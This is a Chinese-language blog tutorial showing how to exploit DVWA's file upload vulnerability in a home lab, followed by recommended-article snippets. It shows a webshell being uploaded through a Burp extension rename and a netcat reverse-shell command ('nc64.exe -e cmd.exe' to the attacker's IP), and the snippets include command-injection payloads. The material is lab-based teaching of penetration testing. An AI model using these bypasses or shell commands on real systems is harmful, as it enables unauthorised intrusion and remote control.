黑客零基础第三章-Web漏洞利用第六节-文件上传漏洞分析利用

最新推荐文章于 2024-07-14 23:47:02 发布
最新推荐文章于 2024-07-14 23:47:02 发布
阅读量3.1k 收藏 1
点赞数 1
分类专栏: 零基础黑客训练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43879344/article/details/119746991
版权

本节讲述了DVWA的文件上传漏洞,演示利用文件上传入侵靶机。

目录

1.场景

2.DVWA 文件上传漏洞简介

3.DVWA 文件上传漏洞利用

4.总结

1.场景


虚拟机:vmware

攻击主机:kali

IP:192.168.239.142

靶机:Windows10

IP:192.168.239.1

服务:xampp启动的DVWA


2.DVWA 文件上传漏洞简介

文件上传漏洞界面是一处图片上传,

这次我们使用medium安全级别(因为low级别的实在是太简单),代码如下,

代码审计后,发现只能上传格式为jpeg和png类型图片,且size不能大于10000。

3.DVWA 文件上传漏洞利用

准备一个一句话木马文件,后缀为.png。

 

 上传文件,并使用burp截获,

使用burp把文件shell.png改为shell.php,

上传成功,并且界面还显示了上传路径。

浏览器输入http://192.168.239.1/DVWA/hackable/uploads/shell.php?cmd=whoami测试上传的一句话木马。命令执行成功,显示了靶机主机名。

在kali上开启nc,浏览器执行URL

 http://192.168.239.1/DVWA/hackable/uploads/shell.php?cmd=nc64.exe -e cmd.exe 192.168.239.142 4444

获取靶机的shell。

 

4.总结

文件上传漏洞的利用需要注意的是,必须知道上传后的路径。如果上传一个木马后无法获得路径,那么也不可能触发从而进行利用。

第七感小宇宙
关注
专栏目录
[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解(含学习路线)
杨秀璋的专栏
07-10 794
这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击,堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文章,希望对您有所帮助!
[系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解
杨秀璋的专栏
12-27 1万+
娜璋AI安全之家于2020年8月18日开通,将专注于Python和安全技术,主要分享Web渗透、系统安全、CVE复现、威胁情报分析、人工智能、大数据分析、恶意代码检测等文章。真心想把自己近十年的所学所做所感分享出来,与大家一起进步。 系统安全系列作者将深入研究恶意样本分析、逆向分析漏洞利用、攻防实战等,通过在线笔记和实践操作的形式分享与博友们学习。前文通过编写程序实现获取Windows系统目录文件,并对其进行加密和解密的过程。这篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),
简学-文件上传漏洞
码农米格的博客
03-22 296
文件上传漏洞0x00 文件上传漏洞的相关概念0x01 一句话木的原理及利用0x02 中国菜刀的使用0x03 文件上传的绕过姿势JavaScript校验MIME类型校验:拓展名校验:解析漏洞文件头检测绕过0x04 文件上传漏洞的防御手段 针对文件上传漏洞的学习。 实验平台采用的是 bWAPP 0x00 文件上传漏洞的相关概念 文件上传功能:是大部分 WEB 应用必被的功能,网站允许用户自行上传头像、一些社交类网站允许用户上传照片、一些服务类网站需要用户上传证明材料的电子档、电商类网站允许用户上传图
文件上传漏洞
m0_70683009的博客
05-21 1223
如果对方中间件是apache属于低版本,我们可以利用文件上传,上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行。
web安全】——文件上传漏洞
Demo不是emo的博客
01-14 9238
文件上传是什么漏洞?让我带你看看吧
DVWA-命令注入漏洞获取目标shell并提到最高权限[msfvenom]
King_Ho的博客
12-21 3187
MSF攻击Windows实验: 方法一 :通过web站点,使用无文件的方式攻击利用执行 方法二:通过web站点,上传webshell, 返回给msf 方法三:攻击其他端口服务,拿到meterpreter 信息收集-Nmap端口扫描 信息收集总在前 root@kali:~# nmap -sV -T4 xxx.xxx.xxx.xxx Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:46 CST Not shown: 992 filtered p
DVWA通关攻略之命令注入
勿山几已
05-06 2395
简要介绍命令注入漏洞,演示手工和burp爆破挖掘命令注入漏洞/RCE
[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
最新发布
杨秀璋的专栏
07-14 682
上一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞利用445端口,并通过Metasploit工具获取shell进行深入的操作。希望对入门的同学有帮助。
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
Web黑客技术揭密》第六章-漏洞挖掘笔记-结合白帽子讲web安全
lynnez_dd的博客
02-20 421
CSRF漏洞挖掘需要确认以下信息: 目标表单是否有有效的token随机串 目标表单是否有验证码 目标是否判断了Referer来源 根目录下 crossdoman.xml的 allow-access-from domain 是否是通配符 目标JSON是否可以自定义callback等 界面劫持漏洞挖掘需要确认以下信息: 目标HTTP响应头是否设置了X-Frame-...
DVWA-命令执行漏洞
Darklord.W
04-09 923
低 没有进行任何过滤,可以直接在后面拼接命令 127.0.0.1&&ipconfig 127.0.0.1&&whoami 中 可见过滤了&&和; 127.0.0.1&ipconfig 127.0.0.1|dir 高 可见过滤了一系列字符,但是"|"中有一个空格,可以借此绕过 127.0.0.1|ip...
文件上传漏洞(一句话木)-学习笔记
小龙在线
08-21 2万+
在很多的渗透过程中,渗透人员会上传一句话木(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木到底是什么呢? 先来看看最简单的一句话木
C++黑客小白的进阶之路(第一世界初识Windows编程之第一关)——Windows的消息机制
风斯在下
09-23 3366
哈罗大家好,我是你们喜欢的蒟蒻君~ 从今天开始,蒟蒻君要和大家一起学习C++黑客啦!! 注:代码在DEV-C++上是编译不了的,需要用vscode或者vc才行。 文章目录简介:消息机制?初探API函数调试消息机制:查看记事本属性 简介:消息机制? Windows中应用是基于消息机制哒~ 消息,就是系统生成的一个32位(相当于int类型)的值,这个值就想系统说明了一个事件 (不会重复)。比如用户点了一下鼠标,敲了一下键盘,或者拖动了一下窗口,这些都会报告给Windows。 了解完什么是Windows的消息.
想学黑客,你必须上的第一课!!!!
成功的心 Blog
12-04 1414
  一,ping  它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助
黑客斗争的 6 天!
热门推荐
纯洁的微笑
03-04 17万+
互联网公司工作,很难避免不和黑客们打交道,我呆过的两家互联网公司,几乎每月每天每分钟都有黑客在公司网站上扫描。有的是寻找 Sql 注入的缺口,有的是寻找线上服务器可能存在的漏洞,大部分都...
XAMPP任意命令执行提升权限漏洞(CVE-2020-11107)
m0_48520508的博客
01-04 1257
0x00简介 XAMPP是一个建站集成软件包,一个易于安装且包含 MySQL、PHP 和 Perl 的 Apache 发行版。类似与WampServer,phpstudy,他可以运行在Wndows、Linux、Mac OS等多种操作。XAMPP 的确非常容易安装和使用:只需下载,解压缩,启动,方便渗透测试人员搭建各种web环境。 0x01漏洞概述 在Windows上的XAMPP 7.2.29之前,7.3.16之前的7.3.x和7.4.4之前的7.4.x中发现了一个问题。非特权用户可以在xampp-cont
求助帮解决博客被黑客入侵的问题
sz_ken的专栏
07-04 659
      我的博客http://ken2004.moblog.cn 凡一博客, 每天都被怀疑是黑 客入侵, 英文广告天天登 到我的博客上,请求帮助解决,我的邮箱zhongjf2004@yahoo.com.cn
漏洞靶场——DVWA+命令执行漏洞
woo233的博客
08-07 3209
DVWA是OWASP官方编写的PHP网站,包含了各种网站常见漏洞
网络安全知识竞赛选择题(31-60题)
weixin_42146366的博客
04-14 3万+
31.PDR模型与访问控制的主要区别(A) (A)PDR把安全对象看作一个整体 (B)PDR作为系统保护的第一道防线 ©PDR采用定性评估与定量评估相结合 (D)PDR的关键因素是人 32.信息安全中PDR模型的关键因素是(A) (A)人 (B)技术 ©模型 (D)客体 33.计算机网络最早出现在哪个年代(B) (A)20世纪50年代 (B)20世纪60年代 ©20世纪80年代 (D)20世纪90...
黑客手册:第二版-探索与防御Web应用安全漏洞
黑客宣言》是一本实用指南,专为那些对探索和利用网络应用程序安全漏洞感兴趣的人设计。所谓“网络应用程序”是指通过浏览器与Web服务器通信的应用程序,涵盖了数据库、文件系统和网络服务等各种技术,但只限于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值